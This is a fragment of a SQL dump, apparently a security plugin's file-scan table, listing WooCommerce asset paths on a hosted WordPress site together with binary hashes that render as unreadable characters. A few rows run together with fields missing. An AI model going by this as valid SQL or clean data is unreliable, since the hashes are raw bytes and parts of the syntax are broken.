Z6JK=pZ3','G1bO6ٶا7\nat3-Q@','',0,'?'),('L1@SwZLﴣ','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variation-items/edit.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variation-items/edit.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1.[<6~\Z','oӂZyj|awxh','',0,'?'),(' ->:B&','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variation-items/index.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variation-items/index.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L[֋!~kD','+ːpء;a\\U4h','',0,'?'),(':a:iivP','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variation-items/types.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variation-items/types.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@PX\r@XU','景@/L6*aѺo*','',0,'?'),('aa4m_Ñd>','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variation-items/variable-product-tour.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variation-items/variable-product-tour.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3H_vW`','.\'\Z i-ܧݗ5d_ 6tKTN','',0,'?'),(';+vdhF','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variation-options/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variation-options/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$h8dd1a3','kú/TƹS\'l= d5,3','',0,'?'),('tk ObCg','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variation-options/edit.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variation-options/edit.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/xb{ ',' PmuiUI/a1\Z:DE؃w3','',0,'?'),('fa5r@^:','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variation-options/index.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variation-options/index.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L[֋!~kD','+ːpء;a\\U4h','',0,'?'),('44<,bV \nZ','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variation-options/types.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variation-options/types.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@PX\r@XU','景@/L6*aѺo*','',0,'?'),('g&\nkŔg','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variations/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variations/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zBU͍','>\02#3\rM\\?I0\\7%','',0,'?'),('%-y*3R=4','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variations/edit.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variations/edit.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','107Q8~','`]* FECcRĬ\'gU|%','',0,'?'),('\\Lg!>Y ','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variations/empty-variations-image.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variations/empty-variations-image.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8\Z-','>Ύ)ͣ_{ꨉ;a}q9:7wQ','',0,'?'),('U4w׃lrYu@d','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variations/index.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variations/index.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L[֋!~kD','+ːpء;a\\U4h','',0,'?'),('^L%ۘp֪:','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variations/types.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/variations/types.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@PX\r@XU','景@/L6*aѺo*','',0,'?'),('D؟>Kj$','wp-content/plugins/woocommerce/assets/client/admin/product-editor/index.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/index.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?U%KNd','g,/$iMu=#b#Nh\0\"','',0,'?'),('?B\\ֺ,uZ{T','wp-content/plugins/woocommerce/assets/client/admin/product-editor/index.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/index.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z2Qǎu>',' _ՋFb25Ex#Bx6*\nu','',0,'?'),('l_!,y','wp-content/plugins/woocommerce/assets/client/admin/product-editor/index.js.LICENSE.txt','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/index.js.LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5o\r||QG{','\'$,bd12\'dRq ,$g9@','',0,'?'),('j  \'QH}','wp-content/plugins/woocommerce/assets/client/admin/product-editor/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&\\OSGlq','t:,7@ۨ3xRiU5`','',0,'?'),('XU\0{/tam','wp-content/plugins/woocommerce/assets/client/admin/product-editor/style.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vO','f+63y|ųE+JeSNO','',0,'?'),(' /kCm','wp-content/plugins/woocommerce/assets/client/admin/product-page/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-page/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$\rEx}c%z','9RޚiJ$w.ehRg\\\"','',0,'?'),('t9dD','wp-content/plugins/woocommerce/assets/client/admin/profile-wizard/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/profile-wizard/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f~Z8/\rВ','{n{ח\0q0o1g:,>','',0,'?'),('zA9Ѫ?','wp-content/plugins/woocommerce/assets/client/admin/shipping-recommendations/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/shipping-recommendations/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F:϶C7%v','\n כt(D1_BmEW','',0,'?'),('Wڟ /{','wp-content/plugins/woocommerce/assets/client/admin/store-alerts/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/store-alerts/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@ؐ~?QCcK','x췪v1\rߋ6̮6$󰈒,c ','',0,'?'),('\\£CWccz$','wp-content/plugins/woocommerce/assets/client/admin/store-performance/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/store-performance/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h:Ƨo','W U0$G#xj:ZvDMSrӡo','',0,'?'),('Tx\Z;6','wp-content/plugins/woocommerce/assets/client/admin/tracks/index.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/tracks/index.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Пt[O&','Xٖ<\0=D%d`rT\"YʑT+yO','',0,'?'),('S!TNx 5}','wp-content/plugins/woocommerce/assets/client/admin/tracks/index.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/tracks/index.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PYn ','johHX ЌXahe\07','',0,'?'),('{܈ul1{{)','wp-content/plugins/woocommerce/assets/client/admin/undefined/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/undefined/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0Xc\"tOF-?%','2Aļt-B#r\" (= =\'\\','',0,'?'),('MjmQ%pr~\0C\n','wp-content/plugins/woocommerce/assets/client/admin/wcpay-payment-welcome-page/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wcpay-payment-welcome-page/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.k7ϙ M/','2*6Hb|','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/onboarding-product-import-notice.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/onboarding-product-import-notice.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ll S73ǪPa','Y#\\=LZ֖G\"6]݊0Zl','',0,'?'),('pb͏^G#','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/onboarding-product-import-notice.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/onboarding-product-import-notice.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m[>Y2`XoϐKT ','gLwq_^V$4j}yWZJ','',0,'?'),('GH\\D֛D&#/','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/onboarding-product-notice.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/onboarding-product-notice.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QhE\\','$H@i\Z[ gk[Q','',0,'?'),('ة`lqת9','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/onboarding-product-notice.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/onboarding-product-notice.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5UWXD!)','NW$\n QY6g:[#CA^','',0,'?'),('9|\'qAF{GDF','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/onboarding-tax-notice.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/onboarding-tax-notice.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e܅>','{6Ǥ 7=6˿\0mF^S>','',0,'?'),('0TYt`ivA+I','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/onboarding-tax-notice.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/onboarding-tax-notice.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%a','k0_Y%c p','',0,'?'),(';c\\t^p~','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/order-tracking.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/order-tracking.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kLMt','N(P mDq','~Sxmr+:*1Kml-R','',0,'?'),('}/m,VTTwV','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/payment-method-promotions.js.LICENSE.txt','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/payment-method-promotions.js.LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'E\0[S','8/*H\nI#=ǧA5Ő','',0,'?'),(';(yq(@@Ơ','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/print-shipping-label-banner.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/print-shipping-label-banner.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ěo`_dم:\n\0',':)s<ymJD/gc%_','',0,'?'),('M3 OB','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/print-shipping-label-banner.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/print-shipping-label-banner.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R/@hfNw','0XKSL˯e-\'(ڰC','',0,'?'),(', ,ɩ1{T ','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/product-category-metabox.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/product-category-metabox.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#\r?ܐE','UlN\nRaSMИ;I3Ɲ','',0,'?'),('0(.eSfQ)','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/product-category-metabox.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/product-category-metabox.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' >v\0sþ3e','&t-ҼPrrPr*P:\\r$P','',0,'?'),('YS\ZJ4k\\','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/product-import-tracking.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/product-import-tracking.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n5;{6.','%mDc}:V\\BEnT','',0,'?'),('n+\"b!C$','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/product-import-tracking.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/product-import-tracking.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h2\\d!VCE','3\'hWqY(7Juiy','',0,'?'),('\'|UG Ndp','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/product-tour.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/product-tour.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3ޢIk9=1l ','VѵJkŚOpv~:ֆa5!','',0,'?'),('n$5}ѫ','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/product-tour.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/product-tour.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^m 5I0JeCF8','֥Gwg&Y\n\047SSz3J$B','',0,'?'),('U専+О','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/product-tracking.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/product-tracking.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/N(%i9T','\'Q=kD\\=߅d>OlX0 @崦wQ','',0,'?'),('mLf~z%̀݋','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/product-tracking.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/product-tracking.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T|(\'ZC','`sY>Tׅuab<>bB9V&M','',0,'?'),('JyD+(iL߆7','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/settings-tracking.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/settings-tracking.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#1q',':J!G1][Di-ݦ xٔ+qן','',0,'?'),('̃`zdKգ}','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/settings-tracking.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/settings-tracking.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ryr0Ώ=U+s','䈕4 ,`I![4l#nUN','',0,'?'),(':I1Ӯh7Z,','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/tags-tracking.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/tags-tracking.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?/lp>-u','5)O8Y*s5W\Z r0a','',0,'?'),('2cH xq(\n','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/tags-tracking.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/tags-tracking.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')3PH9A','jS7hgL@\n\rwF٩q~;Frv','',0,'?'),('KPdrK','wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/variable-product-tour.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/wp-admin-scripts/variable-product-tour.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fO]=IT \\r','{c쎂芍tw\'TfZs','+cm%Œ\Zɖ-iH̪','',0,'?'),('}dv@\'.\n..','wp-content/plugins/woocommerce/assets/css/activation.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/activation.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Qdb\\:bXL','h@Ӯ+o;b3=É\Zķ\\','',0,'?'),('uQn+','wp-content/plugins/woocommerce/assets/css/activation.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/activation.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#_HrݫUBQ','\noQ5 (,obP]\'`|i4=','',0,'?'),('l #[R2v','wp-content/plugins/woocommerce/assets/css/admin-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/admin-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QHc6.]\rT*',' UmZY&I 2.9','',0,'?'),('^I(:궾','wp-content/plugins/woocommerce/assets/css/admin.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɸ+=6|Nz16h','es`dqw,|Q\\BfJI^$Ǻ0G','',0,'?'),('E GX/S','wp-content/plugins/woocommerce/assets/css/admin.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/admin.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ctj\'w\0r','\'אt\">\nmGB.Yvi\ZHS%a','',0,'?'),('=Q0S8u','wp-content/plugins/woocommerce/assets/css/auth-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/auth-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%ME\r\Z.P','l1Į81dfw֒P\'%@I2q9','',0,'?'),('ID$~^#\0','wp-content/plugins/woocommerce/assets/css/auth.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/auth.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G;I',' ^~k<ŗ6hMrDz%NPڠ\n\\','',0,'?'),('B3G-}MS]R','wp-content/plugins/woocommerce/assets/css/auth.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/auth.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S屢gZqI=','ĜlioE^~؅Pfb[9','',0,'?'),('23Tt齫`8','wp-content/plugins/woocommerce/assets/css/dashboard-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/dashboard-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R2g!eR`','R_rE]kШu M\Z~ݲ,^','',0,'?'),(' *&.>+g-n','wp-content/plugins/woocommerce/assets/css/dashboard-setup-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/dashboard-setup-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y\0zlIXW\\','נwDXFu3\nYab4+Jh','',0,'?'),('cOpʲ=,g ','wp-content/plugins/woocommerce/assets/css/dashboard-setup.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/dashboard-setup.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^!0_ ]0Ĭ','/6SnfLC@5ݭn9 \'','',0,'?'),('IU튓S˴:.','wp-content/plugins/woocommerce/assets/css/dashboard-setup.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/dashboard-setup.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o[Z0~6/','`HLZV=u\\F%dbz','',0,'?'),('W0÷gb%>4','wp-content/plugins/woocommerce/assets/css/dashboard.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/dashboard.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`*#vFUG','m~f]!Yb[4!Փ\r0\\F#','',0,'?'),('c0њL,/','wp-content/plugins/woocommerce/assets/css/dashboard.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/dashboard.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F=\ZPd}','iQs\rsJtuڳڎ(#s ','',0,'?'),('΍raI_ݔ','wp-content/plugins/woocommerce/assets/css/helper-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/helper-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%\r<|Z','aBKt-A#wV+-=\ZG$','',0,'?'),('\02];<','wp-content/plugins/woocommerce/assets/css/helper.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/helper.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HZT޵','_R$ g/#DȖ\"4sZǻ','',0,'?'),('>v)ZNB','wp-content/plugins/woocommerce/assets/css/helper.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/helper.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IO<؀̟8V.w','>?V*ݒN -BQr7A','',0,'?'),('aSR_mĩX4','wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-bg_flat_0_aaaaaa_40x100.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-bg_flat_0_aaaaaa_40x100.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y02*iK,]','Pń L]Yj_߿~*W}','',0,'?'),('IS]Kz䷊','wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-bg_flat_75_ffffff_40x100.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-bg_flat_75_ffffff_40x100.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+z{iI','WWBY(\nsk/@l݀L\0','',0,'?'),('_{sW@Dl','wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-bg_glass_55_fbf9ee_1x400.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-bg_glass_55_fbf9ee_1x400.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D^;9p','(PdL쐻9Iwy1Q','',0,'?'),('8-E2`O','wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-bg_glass_65_ffffff_1x400.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-bg_glass_65_ffffff_1x400.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1|2 ^\ry&a4','^=dig`b2+nkO]','',0,'?'),('PpEw0> ^','wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-bg_glass_75_dadada_1x400.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-bg_glass_75_dadada_1x400.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&Vcj2CD','X/LʹjYEBxtd3߶bTj','',0,'?'),('o\\K:uӘ\n7-US','wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-bg_glass_75_e6e6e6_1x400.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-bg_glass_75_e6e6e6_1x400.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hcޟ1D','t\n7e\0ZI|ŞÜ0+','',0,'?'),('OUMps޴p~','wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-bg_glass_95_fef1ec_1x400.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-bg_glass_95_fef1ec_1x400.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D5BJiM^','BZf6;#XVm','',0,'?'),('#c`ԏDq','wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-bg_highlight-soft_75_cccccc_1x100.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-bg_highlight-soft_75_cccccc_1x100.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[MroqXؤqW','}[K;5l-_ZL4Ox/','',0,'?'),('zد=P5 H','wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-icons_222222_256x240.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/jquery-ui/images/ui-icons_222222_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sN5JAZe6','ʪZ6?c7y4','wp-content/plugins/woocommerce/assets/css/jquery-ui/jquery-ui-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/jquery-ui/jquery-ui-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','py[{i,','B} K%79#s4?t-Um','',0,'?'),('%6fbgz2_','wp-content/plugins/woocommerce/assets/css/jquery-ui/jquery-ui.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/jquery-ui/jquery-ui.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W+yJ9-','\0dOn ]&B\"YXL7','',0,'?'),('J08R &\'T','wp-content/plugins/woocommerce/assets/css/jquery-ui/jquery-ui.min.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/jquery-ui/jquery-ui.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gazDjM l','Z]GM1yHQP<ݺ(ט\"hš','',0,'?'),('*kǼ$䠢Y','wp-content/plugins/woocommerce/assets/css/marketplace-suggestions-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/marketplace-suggestions-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G[7ǀ?AP','Rd waM>tI×ɡ','',0,'?'),('_#LG\'\\B+','wp-content/plugins/woocommerce/assets/css/marketplace-suggestions.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/marketplace-suggestions.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S(q֞I','tfeq ?9to3\Z[K!bmT','',0,'?'),('FI!R\n','wp-content/plugins/woocommerce/assets/css/marketplace-suggestions.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/marketplace-suggestions.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l5P̭\0څaUV','zp0l\'bVĬIG7I)~','',0,'?'),('L9INb](t','wp-content/plugins/woocommerce/assets/css/menu-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/menu-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')JmD','胤VQqN|ܺ\nk(','',0,'?'),(',cS̻͘VgBm','wp-content/plugins/woocommerce/assets/css/menu.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/css/menu.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{[s/|w$|','9-%\0xYgy; 